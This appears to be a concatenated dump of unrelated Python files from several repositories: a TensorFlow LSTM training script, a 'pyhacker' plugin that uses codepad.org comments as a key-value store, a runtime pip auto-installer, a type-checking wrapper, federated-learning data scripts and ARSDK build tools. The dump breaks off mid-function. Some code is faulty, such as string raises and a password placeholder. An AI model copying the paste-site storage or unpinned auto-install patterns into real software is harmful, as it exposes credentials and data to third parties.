cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=onehot_labels, logits=logit_outputs) loss = tf.reduce_sum(cross_entropy) / self.batch_size with tf.variable_scope("rcst"): if i > 0: tf.get_variable_scope().reuse_variables() output_rcst, state_rcst = self.lstm_rcst(output, state_rcst) output_rcst_proj = tf.matmul(output_rcst, self.linear_rcst_W) + self.linear_rcst_b current_rcst_loss = tf.reduce_sum(tf.square((output_rcst_proj - prev_h))) * self.rcst_weight current_rcst_loss /= self.batch_size rcst_loss += current_rcst_loss return loss, rcst_loss, logit_outputs, pixels, onehot_labels def train(opt, x_train, y_train, x_test, y_test): tf.set_random_seed(opt.seed) model = LSTM(opt) tf_loss, tf_rcst_loss, tf_logit_outputs, tf_pixels, tf_onehot_labels = model.build_model() config = tf.ConfigProto() config.gpu_options.allow_growth = True sess = tf.InteractiveSession(config=config) # restore from the pre-trained model saver = tf.train.Saver(max_to_keep=opt.max_epochs, write_version=1) saver.restore(sess, opt.rcst_model_base_path) tf_learning_rate = tf.placeholder(tf.float32) with tf.variable_scope(tf.get_variable_scope(), reuse=False): train_op = tf.train.AdamOptimizer(tf_learning_rate).minimize(tf_loss) uninitialized_vars = [] for var in tf.global_variables(): try: sess.run(var) except tf.errors.FailedPreconditionError: uninitialized_vars.append(var) if len(uninitialized_vars): init_new_vars_op = tf.variables_initializer(uninitialized_vars) sess.run(init_new_vars_op) iter_cnt = 0 for epoch in range(0, opt.max_epochs): if epoch == 0: current_learning_rate = opt.learning_rate elif epoch != 0 and epoch % opt.learning_rate_decay_every == 0: current_learning_rate = current_learning_rate * opt.learning_rate_decay_rate # training for start, end in zip(range(0, x_train.shape[0], opt.batch_size), range(opt.batch_size, x_train.shape[0], opt.batch_size)): start_time = time.time() current_batch_pixels_train = x_train[start:end] current_batch_labels_train = y_train[start:end] feed_dict = {tf_learning_rate: current_learning_rate, tf_pixels: current_batch_pixels_train, tf_onehot_labels: current_batch_labels_train} _, loss_val, rcst_loss_val, logit_outputs = sess.run([train_op, tf_loss, tf_rcst_loss, tf_logit_outputs], feed_dict) # 计算训练精度 pred_y = np.argmax(logit_outputs, axis=1) true_y = np.argmax(current_batch_labels_train, axis=1) current_acc = sum(pred_y == true_y) / float(opt.batch_size) iter_cnt += 1 end_time = time.time() print("iter {:4d} epoch {:3d} lr {:.5f} loss {:.4f} rcst_loss {:.4f} train_acc {:.4f} time batch {:.4f}".format(iter_cnt, epoch, current_learning_rate, loss_val, rcst_loss_val, current_acc, end_time-start_time)) # validation if np.mod(epoch, 1) == 0: print("epoch {} is done, saving the model ...".format(epoch)) saver.save(sess, os.path.join(opt.rcst_model_save_path, 'model_epoch'), global_step=epoch) true_cnt = 0 test_batch_cnt = 0 for start, end in zip(range(0, x_test.shape[0], opt.batch_size), range(opt.batch_size, x_test.shape[0], opt.batch_size)): current_batch_pixels_test = x_test[start:end] current_batch_labels_test = y_test[start:end] feed_dict = {tf_learning_rate: current_learning_rate, tf_pixels: current_batch_pixels_test, tf_onehot_labels: current_batch_labels_test} loss_test, logit_outputs = sess.run([tf_loss, tf_logit_outputs], feed_dict) # 计算验证精度 pred_y = np.argmax(logit_outputs, axis=1) true_y = np.argmax(current_batch_labels_test, axis=1) true_cnt += sum(pred_y == true_y) test_batch_cnt += 1 test_acc = true_cnt / float(test_batch_cnt * opt.batch_size) print("epoch {} test_acc {:.4f} test_num: {}".format(epoch, test_acc, test_batch_cnt * opt.batch_size)) if __name__ == '__main__': opt = opts.parse_opt() opt_dict = vars(opt) for k, v in opt_dict.items(): print(k + ': \t' + str(v)) with open('permuted_mnist_110.pkl', 'rb') as f: permuted_mnist = cPickle.load(f) if os.path.isdir(opt.rcst_model_save_path) is False: os.mkdir(opt.rcst_model_save_path) x_train_permuted = permuted_mnist['x_train_permuted'] y_train = permuted_mnist['y_train'] x_test_permuted = permuted_mnist['x_test_permuted'] y_test = permuted_mnist['y_test'] # training train(opt, x_train_permuted, y_train, x_test_permuted, y_test) ```
{ "source": "201528015329004/pyhacker", "score": 3 }
#### File: my_plugins/kvdb/openkvCore.py ```python import base64 import urllib2 import datetime class OpenKVCore: def postComment(self, session, content, comment_url): comment_data = {'parent': "", 'text': content, 'submit': "Post Comment"} r = session.post(comment_url, data=comment_data) if r.ok: s = r.url if s.find("comment") == -1: raise ("failed to upload") return False else: return True raise ("server error") return False def getHtml(self, session, webbase_id): info_url = 'http://codepad.org/' + webbase_id r = session.get(info_url) if r.ok: return r.text raise ("server error") def filteredContent(self, record, username, password, key): items = record.split('#SEP#') time, user, pwd, key, value = tuple(items) if user == username.strip() and pwd == password.strip(): return key, base64.b64decode(value), time return None def login(self, root, pwd, session): login_url = 'http://codepad.org/login' login_data = {'username': root, 'password': <PASSWORD>, 'submit': 'Login'} r = session.post(login_url, data=login_data) if r.ok: ret = r.text if ret.find("logout") == -1: raise ("failed to init") return False return True else: print ("server error") return False def fastVerify(self, record, username, password, key=None): if key is None: s = '#SEP#' + username + '#SEP#' + password + '#SEP#' else: s = '#SEP#' + username + '#SEP#' + password + '#SEP#' + key + '#SEP#' return record.find(s) >= 0 def getOnlineUTCTime(self): webpage = urllib2.urlopen("http://just-the-time.appspot.com/") internettime = webpage.read() OnlineUTCTime = datetime.datetime.strptime(internettime.strip(), '%Y-%m-%d %H:%M:%S') return OnlineUTCTime ``` #### File: pyhacker/utils/package_manage.py ```python def install_and_import(package): import importlib try: importlib.import_module(package) except ImportError: import pip pip.main(['install', package]) finally: globals()[package] = importlib.import_module(package) ```
{ "source": "201528015329004/TyPy", "score": 2 }
#### File: TyPy/typy/typy.py ```python class TypeBase(object): __static_types__ = {} def __init__(self): original_members = ['__static_types__', '__class__', '__delattr__', '__dict__', '__doc__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__used_keys__', '__weakref__','submit', 'get_members'] user_defined_members = set(dir(self)) - set(original_members) functions,variables= [],[] for name in user_defined_members: if callable(getattr(self,name)): functions.append(name) else: variables.append(name) #print 'func',functions #print 'var',variables def __setattr__(self,attr,value): t_value = TypeVar(type(value),value) if hasattr (self,attr): # need to check the type # value is of TypeVar prestored = getattr(self,attr) if type(prestored) == TypeVar: # if the attr is an attr defined by self.attr if type(value) == TypeVar: if prestored.t_raw == value.t_raw: super(TypeBase,self).__setattr__(attr,t_value) return else: print "value.t == prestored.t:",value.t_raw,prestored.t_raw,prestored.t_raw == value.t_raw raise TypeError("{} should be of type {}, but got {}".format(str(attr), prestored.t, value.t)) # value is not of TypeVar elif type(value) == prestored.t_raw: super(TypeBase,self).__setattr__(attr,t_value) return else: raise TypeError("{} should be of type {}, but got {}".format(str(attr), prestored.t, type(value))) else: if attr in dir(self): # this attr is a class attr, I will just keep it as it is TypeBase.__static_types__[attr] = type(prestored) if type(value) == TypeVar: if value.t_raw == TypeBase.__static_types__[attr]: super(TypeBase,self).__setattr__(attr,value) return else: raise TypeError("{} should be of type {}, but got {}".format(str(attr), TypeBase.__static_types__[attr], value.t_raw)) elif type(value) == TypeBase.__static_types__[attr]: super(TypeBase,self).__setattr__(attr,value) return else: raise TypeError("{} should be of type {}, but got {}".format(str(attr), TypeBase.__static_types__[attr], type(value))) else: raise TypeError("{} is not defined in instances of {}".format(str(attr), self.__class__)) else: super(TypeBase,self).__setattr__(attr,t_value) class TypeVar(object): def __init__(self,objType,value=None): if type(objType) != type and type(objType) != TypeDef: raise TypeError("the 1st parameter should be of 'type' type") if value is not None: if type(value) != objType: raise TypeError("expected the type of 'value' to be {}, got {}".format(objType,type(value))) self.__objType__ = objType if type(objType) == TypeDef else TypeDef(objType) self.__objValue__ = value def __getattr__(self,name): if hasattr(super(TypeVar,self),name): return getattr(super(TypeVar,self),name) elif hasattr(self.__objValue__,name): return getattr(self.__objValue__,name) def __dir__(self): dir_list = dir(super(TypeVar,self)) dir_list.extend(dir(self.__objValue__)) return dir_list @staticmethod def var(value): return TypeVar.__create__(type(value),value) @staticmethod def __create__(objType,value=None): instance = TypeVar(objType,value) return instance def _consistent_type(self,obj): if type(obj) != TypeDef: return self.t_raw == type(obj) return self.t_raw == obj.t_raw def _is_value_and_type_consistent(self): if type(self.__objType__) == type: return self.__objType__ == type(self.__objValue__) if type(self.__objType__) == TypeDef: return self.__objType__.t_raw == type(self.__objValue__) def _is_computable(self,raw_type): number_types = [int,float,long,complex] if self.t_raw in number_types and raw_type in number_types: return True else: return False def __get_type_and_value(self,other): if type(other) == TypeDef: raw_type = other.t_raw raw_value = other.v else: raw_type = type(other) raw_value = other return raw_type,raw_value def assign(self,value): if value == None: self.v = None return if type(value) == TypeVar: if self.t == value.t: self.__objValue__ = value.v return else: raise TypeError("Assignment failed. expecting {}, got {}".format(self.t,value.t)) if self.t_raw == type(value): self.__objValue__ = value else: raise TypeError("Assignment failed. expecting {}, got {}".format(self.t_raw,type(value))) def __operation_value__(self,value): if type(value) != TypeVar: ret = TypeVar.__create__(type(value),value) return ret else: return value def __add__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v + raw_value.v else: value = self.v + raw_value return self.__operation_value__(value) def __sub__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v - raw_value.v else: value = self.v - raw_value return self.__operation_value__(value) def __mul__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v * raw_value.v else: value = self.v * raw_value return self.__operation_value__(value) def __pow__(self,other): raw_type,raw_value = self.__get_type_and_value(other) print "raw_type,raw_value",raw_type,raw_value if hasattr(raw_value,'v'): value = self.v ** raw_value.v else: value = self.v ** raw_value return self.__operation_value__(value) def __truediv__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v / raw_value.v else: value = self.v / raw_value return self.__operation_value__(value) def __floordiv__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v // raw_value.v else: value = self.v // raw_value return self.__operation_value__(value) def __mod__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v % raw_value.v else: value = self.v % raw_value return self.__operation_value__(value) def __lshift__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v << raw_value.v else: value = self.v << raw_value return self.__operation_value__(value) def __rshift__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v >> raw_value.v else: value = self.v >> raw_value return self.__operation_value__(value) def __and__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v & raw_value.v else: value = self.v & raw_value return self.__operation_value__(value) def __or__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v | raw_value.v else: value = self.v | raw_value return self.__operation_value__(value) def __eq__(self, other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v == raw_value.v else: value = self.v == raw_value return self.__operation_value__(value) def __ne__(self, other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v != raw_value.v else: value = self.v != raw_value return self.__operation_value__(value) def __xor__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v ^ raw_value.v else: value = self.v ^ raw_value return self.__operation_value__(value) def __lt__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v < raw_value.v else: value = self.v < raw_value return self.__operation_value__(value) def __gt__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v > raw_value.v else: value = self.v > raw_value return self.__operation_value__(value) def __ge__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v >= raw_value.v else: value = self.v >= raw_value return self.__operation_value__(value) def __le__(self,other): raw_type,raw_value = self.__get_type_and_value(other) if hasattr(raw_value,'v'): value = self.v <= raw_value.v else: value = self.v <= raw_value return self.__operation_value__(value) def __invert__(self): value = ~self.v return self.__operation_value__(value) def __str__(self): return str(self.__objValue__) def __repr__(self): return self.__str__() @property def v(self): return self.__objValue__ @property def t(self): return self.__objType__ @property def t_raw(self): return self.__objType__.t def __type__(self): return str(self.t) class TypeDef(object): def __init__(self,objType): if type(objType) == type: self.__objType__ = objType else: raise TypeError("the 1st parameter should be of 'type' type") def __str__(self): return str(self.__objType__) def __repr__(self): return "Type wrapper for " + repr(self.__objType__) @property def t(self): return self.__objType__ ```
{ "source": "20155104009/GMSNet", "score": 2 }
#### File: GMSNet/model/template.py ```python import math import numpy as np import torch import torch.nn as nn import torch.nn.functional as F class Network(nn.Module): def __init__(self): super(Network, self).__init__() def forward(self, x): return x ```
{ "source": "2016312357/FL-shield", "score": 2 }
#### File: 2016312357/FL-shield/1.py ```python import random import numpy as np a=np.mean([1,3,5,6,7,8]) print(a) import scipy.sparse as sp import collections def load_client_train_date(): # for FL train filename = "./Data/train_data" num_users = 0 num_items = 0 with open(filename, "r") as f: line = f.readline() while line is not None and line != "": arr = line.split("\t") u, i = int(arr[0]), int(arr[1]) num_users = max(num_users, u) num_items = max(num_items, i) line = f.readline() num_items += 1 num_users += 1 print(num_users,num_items) mat = sp.dok_matrix((num_users, num_items), dtype=np.float32) with open(filename, "r") as f: line = f.readline() while line is not None and line != "": arr = line.split("\t") user, item, rating = int(arr[0]), int(arr[1]), float(arr[2]) # print("usr:{} item:{} score:{}".format(user,item,rating)) if rating > 0: mat[user, item] = 1.0 line = f.readline() #client_datas = [[[], [], []] for i in range(num_users)] # 三元组 !!!!!!!!!!!!!! with open('./Data/test_negative','a+') as w, open('./Data/test_data','r') as r: line = r.readline() while line is not None and line != "": arr = line.split("\t") user, item = int(arr[0]), int(arr[1]) w.write('('+str(user)+','+str(item)+')') line = r.readline() for t in range(99): # 任意选择一个没有看的电影,作为negative项 nega_item = np.random.randint(num_items) while nega_item==item or (user, nega_item) in mat.keys(): nega_item = np.random.randint(num_items) w.write('\t'+str(nega_item)) w.write('\n') print('done') #load_client_train_date() ``` #### File: 2016312357/FL-shield/Noise_add.py ```python import numpy as np import copy # import torch import random # from Calculate import get_1_norm#, get_2_norm, inner_product, avg_grads def noise_add(noise_scale, w): w_noise = copy.deepcopy(w) if isinstance(w[0], np.ndarray) == True: noise = np.random.normal(0, noise_scale, w.size()) w_noise = w_noise + noise else: for k in range(len(w)): for i in w[k].keys(): noise = np.random.normal(0, noise_scale, w[k][i].size()) '''if args.gpu != -1: noise = torch.from_numpy(noise).float().cuda() else: noise = torch.from_numpy(noise).float()''' w_noise[k][i] = w_noise[k][i] + noise return w_noise def users_sampling(args, w, chosenUsers): if args.num_chosenUsers < args.num_users: w_locals = [] for i in range(len(chosenUsers)): w_locals.append(w[chosenUsers[i]]) else: w_locals = copy.deepcopy(w) return w_locals '''def clipping(args, w): if get_1_norm(w) > args.clipthr: w_local = copy.deepcopy(w) for i in w.keys(): w_local[i]=copy.deepcopy(w[i]*args.clipthr/get_1_norm(w)) else: w_local = copy.deepcopy(w) return w_local''' ```
{ "source": "2016-Capstone/PythonController", "score": 2 }
#### File: arsdk-xml/ARSDKBuildUtils/SDK3Build.py ```python import os import sys import subprocess import shutil try: import argcomplete hasArgComplete = True except ImportError: hasArgComplete = False MYDIR=os.path.abspath(os.path.dirname(sys.argv[0])) if '' == MYDIR: MYDIR=os.getcwd() sys.path.append('%(MYDIR)s/Utils/Python' % locals()) #Custom imports from xml.dom.minidom import parseString from ARFuncs import * from time import localtime, strftime from Common_GitUtils import * import commandLine import xmlreader import time #This is a message to announce the new build system ARPrint ('\n\nThis script is deprecated and doesn\'t work anymore.\n') ARPrint ('Please download repo (http://source.android.com/source/downloading.html#installing-repo).') ARPrint ('Then run \'repo init -u https://github.com/Parrot-Developers/arsdk_manifests.git\' in an empty folder.') ARPrint ('Then run \'repo sync\' to get all sources.') ARPrint ('After that, you\'ll be able to run \'./build.sh\' to build the SDK.') ARPrint ('\n\nYou can find a full documentation here: http://developer.parrot.com/docs/bebop/#go-deeper\n\n') exit(0) # After that comment, this is the old build. Left here in memory of the old time we spent building the SDK with it. RIP start = time.time() DEBUG_MODE = False # # Init the log file # ARInitLogFile() # # Get extra xml dirs # xmlDirs = [ MYDIR ] try: extraXmlDirs = os.environ['ARSDK_EXTRA_XML_DIRS'].split(':') xmlDirs.extend(extraXmlDirs) xmlDirs.remove('') except: pass # # Parse XML # (repos, targets, prebuilts, libraries, binaries) = xmlreader.parseAll(xmlDirs) if DEBUG_MODE: ARPrint ('Debug mode enabled : dump XML contents') repos.dump() targets.dump() prebuilts.dump() libraries.dump() binaries.dump() EXIT(0) # # Parse command line args # parser = commandLine.CommandLineParser(targets, libraries, binaries) if hasArgComplete: argcomplete.autocomplete(parser.parser) parser.parse(sys.argv) # # Dump command line args into log file # parser.dump() # # Export useful tools if available # (e.g. colormake) # ARMakeArgs = '-j ' + str(parser.threads) ARSetEnvIfExists('ARMAKE', 'colormake', 'make', args=ARMakeArgs) # Import targets functions for library/binary/doc # This block will try to import the functions for all targets declared in targets.xml file # Adding a new target requires the following modifications : # 1> Add the target in targets.xml filr # 2> Adapt libraries.xml / binaries.xml to support this target # 3> Create the Target_BuildLibrary.py script in Utils/Python dir # -> This file must contain a Target_BuildLibrary(target, lib, clean=False, debug=False) function # 4> (Optionnal) Create the Target_BuildBinary.py script in Utils/Python dir # -> This file must contain a Target_BuildBinary(target, bin, clean=False, debug=False) function # 5> (Optionnal) Create the Target_GenLibraryDoc.py script in Utils/Python dir # -> This file must contain a Target_GenLibraryDoc(target, lib, clean=False) function BUILD_LIB_FUNCS = {} BUILD_BIN_FUNCS = {} GEN_DOC_FUNCS = {} for t in targets.list: try: _name = t.name + '_BuildLibrary' _module = __import__ (_name) BUILD_LIB_FUNCS[t.name] = getattr (_module, _name) except ImportError: pass try: _name = t.name + '_BuildBinary' _module = __import__ (_name) BUILD_BIN_FUNCS[t.name] = getattr (_module, _name) except ImportError: pass try: _name = t.name + '_GenLibraryDoc' _module = __import__ (_name) GEN_DOC_FUNCS[t.name] = getattr (_module, _name) except ImportError: pass # # Do force clean if needed # if parser.isForceClean: ARLog("Force clean !") TARGETDIR = '%(MYDIR)s/Targets' % locals() ARDeleteIfExists (TARGETDIR) # Do all-cleanup if needed if parser.isForceCleanup: allRepoDirs=[] for repo in repos.list: if not repo.ext: allRepoDirs.append(repo.getDir()) cleanScript = '%(MYDIR)s/Utils/cleanupSDKRepo.bash' % locals() ARExecute(cleanScript + ' ' + ARListAsBashArg(allRepoDirs)) exit(0) # # Do all repo work: # - Clone non existant repositories # - Checkout the requested branch/tag/commit # - If on a branch, pull it # if not parser.noGit: checkAllReposUpToDate(repos, MYDIR, parser.repoBaseUrl, parser.defaultBaseRepoUrl, extraScripts=parser.extraGitScripts) else: ARLog('Skipping git checks') if parser.doNothing: ARLog('Nothing to be done') exit(0) # Android case --> Force minimum api level and target api level ARSetEnv('AR_ANDROID_MIN_VERSION', '14') ARSetEnv('AR_ANDROID_API_VERSION', '19') # # Actual build loop # allOk = True for target in parser.activeTargets: libraries.clearCache() binaries.clearCache() if parser.activeLibs: if target.name in BUILD_LIB_FUNCS: for lib in parser.activeLibs: if not BUILD_LIB_FUNCS[target.name](target, lib, clean=parser.isClean, debug=parser.isDebug, nodeps=parser.noDeps, inhouse=parser.isInHouse, requestedArchs=parser.archs, isMp=parser.multiProcess): allOk = False else: ARLog('Unable to build libraries for target %(target)s' % locals()) if parser.genDoc and not parser.isClean: if target.name in GEN_DOC_FUNCS: for lib in parser.activeLibs: GEN_DOC_FUNCS[target.name](target, lib) TargetDocIndexScript = ARPathFromHere('Utils/generateDocIndex.bash') TargetDocIndexPath = ARPathFromHere('Targets/%(target)s/Build/Doc' % locals()) ARExecute('%(TargetDocIndexScript)s %(TargetDocIndexPath)s %(target)s' % locals()) else: ARLog('Unable to generate documentation for target %(target)s' % locals()) if parser.activeBins: if target.name in BUILD_BIN_FUNCS: for bin in parser.activeBins: if not BUILD_BIN_FUNCS[target.name](target, bin, clean=parser.isClean, debug=parser.isDebug, nodeps=parser.noDeps, inhouse=parser.isInHouse, requestedArchs=parser.archs): target.failed = True allOk = False else: ARLog('Unable to build binaries for target %(target)s' % locals()) for scrinfo in target.postbuildScripts: scr = scrinfo['path'] if allOk: if not ARExecute(scr + ' >/dev/null 2>&1', failOnError=False): ARPrint('Error while running ' + scr + '. Run manually to see the output') target.failed = True scrinfo['done'] = False allOk=False else: scrinfo['done'] = True if not allOk: break if parser.installDoc and allOk: DocCopyScript = ARPathFromHere('Utils/copyDoc.bash') for target in parser.activeTargets: ARExecute ('%(DocCopyScript)s %(target)s' % locals()) hasColors = ARExecute('tput colors >/dev/null 2>&1', failOnError=False, printErrorMessage=False) if ARExistsInPath('stty'): termSizeStr = ARExecuteGetStdout(['stty', 'size'], failOnError=False, printErrorMessage=False) termSizeArr = termSizeStr.split(' ') try: termCols = int(termSizeArr[1]) - 1 except: termCols = 80 else: termCols = 80 class logcolors: FAIL = '\033[31m' if hasColors else 'FA:' PASS = '\033[32m' if hasColors else 'OK:' REQ = '\033[33m' if hasColors else 'ND:' NONE = '\033[34m' if hasColors else 'NR:' UNAI = '\033[30m' if hasColors else 'NA:' DEF = '\033[39m' if hasColors else '' def SDKPrintStatus(msg, available, requested, tried, built, padToLen=20, newline=False, currentCol=0, baseCol=0): colorLen = 3 if not hasColors else 0 padLen = padToLen - len(msg) while padLen <= 0: padLen += padToLen printLen = len(msg) + padLen + colorLen futureCol = currentCol + printLen if futureCol > termCols: newline = True if newline: ARPrint('') ARPrint(' '*baseCol, True) futureCol = printLen + baseCol if not available: ARPrint(logcolors.UNAI, True) elif not requested and not tried: ARPrint(logcolors.NONE, True) elif not tried: ARPrint(logcolors.REQ, True) elif not built: ARPrint(logcolors.FAIL, True) else: ARPrint(logcolors.PASS, True) ARPrint(msg, True) if padLen > 0: ARPrint(' '*padLen, True) ARPrint(logcolors.DEF, True) return futureCol ARPrint('') ARPrint('Status :') ARPrint(' --> Legend : ' + logcolors.FAIL + 'FAIL ' + logcolors.PASS + 'PASS ' + logcolors.REQ + 'NOT_BUILT ' + logcolors.NONE + 'NOT_REQUESTED ' + logcolors.UNAI + 'NOT_AVAILABLE ' + logcolors.DEF) ARPrint(' --> Binaries are postfixed with `*`') ARPrint(' --> Postbuild scripts are postfixed with `+`') ARPrint('') offset = 13 if hasColors else 16 for t in targets.list: targetRequested = t in parser.activeTargets targetTried = bool(t.triedToBuildLibraries) targetBuilt = len(t.alreadyBuiltLibraries) == len(t.triedToBuildLibraries) and not t.failed SDKPrintStatus(t.name, True, targetRequested, targetTried, targetBuilt, padToLen=10) ARPrint(' : ', True) count=offset first=False for l in libraries.list: libAvailable = l.isAvailableForTarget(t) libRequested = l in parser.activeLibs and targetRequested libTried = t.hasTriedToBuild(l) libBuilt = t.hasAlreadyBuilt(l) count = SDKPrintStatus(l.name, libAvailable, libRequested, libTried, libBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset) first=False first=True for b in binaries.list: binAvailable = b.isAvailableForTarget(t) binRequested = b in parser.activeBins and targetRequested binTried = t.hasTriedToBuildBinary(b) binBuilt = t.hasAlreadyBuiltBinary(b) count = SDKPrintStatus(b.name + '*', binAvailable, binRequested, binTried, binBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset) first=False first=True for scrinfo in t.postbuildScripts: scrAvailable = True scrRequescted = targetRequested scrTried = scrinfo['done'] is not None scrBuilt = bool(scrinfo['done']) count = SDKPrintStatus(scrinfo['name'] + '+', scrAvailable, scrRequescted, scrTried, scrBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset) first=False ARPrint('') ARPrint('') ARLog('End of build') if not allOk: ARLog('-- Errors were found during build ! --') end = time.time() seconds = int(end - start) hours, tmp = divmod(seconds, 3600) minutes, seconds = divmod(tmp, 60) strh='' strm='' strs = str(seconds) + 's' if hours > 0: strh = str(hours) + 'h ' strm = str(minutes) + 'm ' if minutes > 0: strm = str(minutes) + 'm ' ARLog('Build took %(strh)s%(strm)s%(strs)s' % locals()) sys.exit (0 if allOk else 1) ``` #### File: Utils/Python/ARFuncs.py ```python import sys import subprocess import os import inspect import shutil import re import filecmp import errno # Print a message def ARPrint(msg, noNewLine=False): sys.stdout.write(msg) if not noNewLine: sys.stdout.write('\n') # Exit the script with an optional error code def EXIT(code): if code != 0: ARPrint('-- ABORTING --') sys.exit(code) # Class to handle 'cd' and 'cd -' class Chdir: def __init__(self, newPath, create=True, verbose=True): self.savedPath = os.getcwd() if not os.path.exists(newPath) and create: os.makedirs(newPath) os.chdir(newPath) self.verbose = verbose if verbose: try: ARLog('Entering <%(newPath)s>' % locals()) except: pass def exit(self): os.chdir(self.savedPath) if self.verbose: try: ARLog('Returning to <'+self.savedPath+'>') except: pass # Execute a bash command def ARExecute(cmdline, isShell=True, failOnError=False, printErrorMessage=True): try: if printErrorMessage: ARLog('Running <%(cmdline)s>' % locals()) subprocess.check_call(cmdline, shell=isShell) return True except subprocess.CalledProcessError as e: if printErrorMessage: ARPrint('Error while running <%(cmdline)s>' % locals()) if failOnError: EXIT(e.returncode) else: return False # Execute a bash command, and return the stdout output def ARExecuteGetStdout(args, isShell=False, failOnError=True, printErrorMessage=True): if printErrorMessage: ARLog('Running <' + ARListAsBashArg(args) + '>') p = subprocess.Popen(args, shell=isShell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True) out, err = p.communicate() ret = p.wait() if ret: if printErrorMessage: ARLog('Error while running <' + ARListAsBashArg(args) + '>') if failOnError: EXIT(ret) return '' return out.strip() # Checks if a given commands exists in path def ARExistsInPath(program, isShell=True): try: subprocess.check_call('which %(program)s 2>/dev/null 1>/dev/null' % locals(), shell=isShell) return True except subprocess.CalledProcessError as e: return False # Set an environment variable def ARSetEnv(var, val): os.environ[var] = val # Set an environment variable if not currenly defined # return True if the variable was added def ARSetEnvIfEmpty(var, val): if os.environ.get(var) is None: os.environ[var] = val return True return False # Unset an environment variable def ARUnsetEnv(var): if var in os.environ: os.environ.pop(var) # Set an environment variable to 'ideal' if it exists in path, else to 'fallback' def ARSetEnvIfExists(var, ideal, fallback, args=''): if ARExistsInPath(ideal): ARSetEnv(var, ideal + ' ' + args) else: ARSetEnv(var, fallback + ' ' + args) # Append a message to a file def ARAppendToFile(filename, message, doPrint=True): arfile = open(filename, 'a') arfile.write(message + '\n') arfile.close() if doPrint: ARPrint(message) # Log a message(append to the default logfile + output to console) def ARLog(message): LOGFILE = os.environ.get('ARLOGF') if not LOGFILE: LOGFILE = ARPathFromHere('build.log') ARAppendToFile(LOGFILE, message) # Init the default log file def ARInitLogFile(): LOGFILE = ARPathFromHere('build.log') ARSetEnv('ARLOGF', LOGFILE) ARDeleteIfExists(LOGFILE) # Get the absolute path from a relative path def ARPathFromHere(path): MYDIR=os.path.abspath(os.path.dirname(sys.argv[0])) if '' == MYDIR: MYDIR=os.getcwd() return '%(MYDIR)s/%(path)s' % locals() # Get the absolute path from a relative path def ARPathFromPwd(path): MYDIR=os.getcwd() return '%(MYDIR)s/%(path)s' % locals() # Transform a python list to a bash args list def ARListAsBashArg(lst): return ' '.join(lst) # Checks if file A is newer than file B def ARFileIsNewerThan(fileA, fileB): if not os.path.exists(fileA): return False if not os.path.exists(fileB): return True return os.stat(fileA).st_mtime > os.stat(fileB).st_mtime # Called at the beginning of a function to log its start with all its arguments def StartDumpArgs(**kwargs): CallerName = inspect.stack()[1][3] if len(kwargs) > 0: ARLog('Start running %(CallerName)s with args:' % locals()) else: ARLog('Start running %(CallerName)s' % locals()) for key, value in kwargs.items(): ARLog(' -- %(key)s -> %(value)s' % locals()) # Called at the end of a function to log its return status and all its arguments # (use 'return EndDumpArgs(res=True/False, args)') def EndDumpArgs(res, **kwargs): CallerName = inspect.stack()[1][3] START_MSG = 'Finished' if not res: START_MSG = 'Error while' if len(kwargs) > 0: ARLog('%(START_MSG)s running %(CallerName)s with args:' % locals()) else: ARLog('%(START_MSG)s running %(CallerName)s' % locals()) for key, value in kwargs.items(): ARLog(' -- %(key)s -> %(value)s' % locals()) return res # Copy and replace a file def ARCopyAndReplaceFile(SrcFile, DstFile): if not os.path.exists(SrcFile): raise Exception('%(SrcFile)s does not exist' % locals()) if not os.path.exists(os.path.dirname(DstFile)): os.makedirs(os.path.dirname(DstFile)) shutil.copy2(SrcFile, DstFile) def ar_copytree(src, dst, symlinks=False, ignore=None): names = os.listdir(src) if ignore is not None: ignored_names = ignore(src, names) else: ignored_names = set() if not os.path.exists(dst): os.makedirs(dst) errors = [] for name in names: if name in ignored_names: continue srcname = os.path.join(src, name) dstname = os.path.join(dst, name) try: if symlinks and os.path.islink(srcname): linkto = os.readlink(srcname) os.symlink(linkto, dstname) elif os.path.isdir(srcname): ar_copytree(srcname, dstname, symlinks, ignore) else: shutil.copy2(srcname, dstname) # XXX What about devices, sockets etc.? except (IOError, os.error) as why: errors.append((srcname, dstname, str(why))) # catch the Error from the recursive copytree so that we can # continue with other files except shutil.Error as err: errors.extend(err.args[0]) try: shutil.copystat(src, dst) except shutil.WindowsError: # can't copy file access times on Windows pass except OSError as why: errors.extend((src, dst, str(why))) if errors: raise shutil.Error(errors) # Recursive copy and replace of a directory. # Can optionnaly delete the previous content of the destination directory # instead of merging def ARCopyAndReplace(SrcRootDir, DstRootDir, deletePrevious=False, ignoreRegexpsForDeletion=[]): if not os.path.exists(SrcRootDir): raise Exception('%(SrcRootDir)s does not exist' % locals()) if deletePrevious: if ignoreRegexpsForDeletion: ARDeleteRecursivelyNonMatching(DstRootDir, 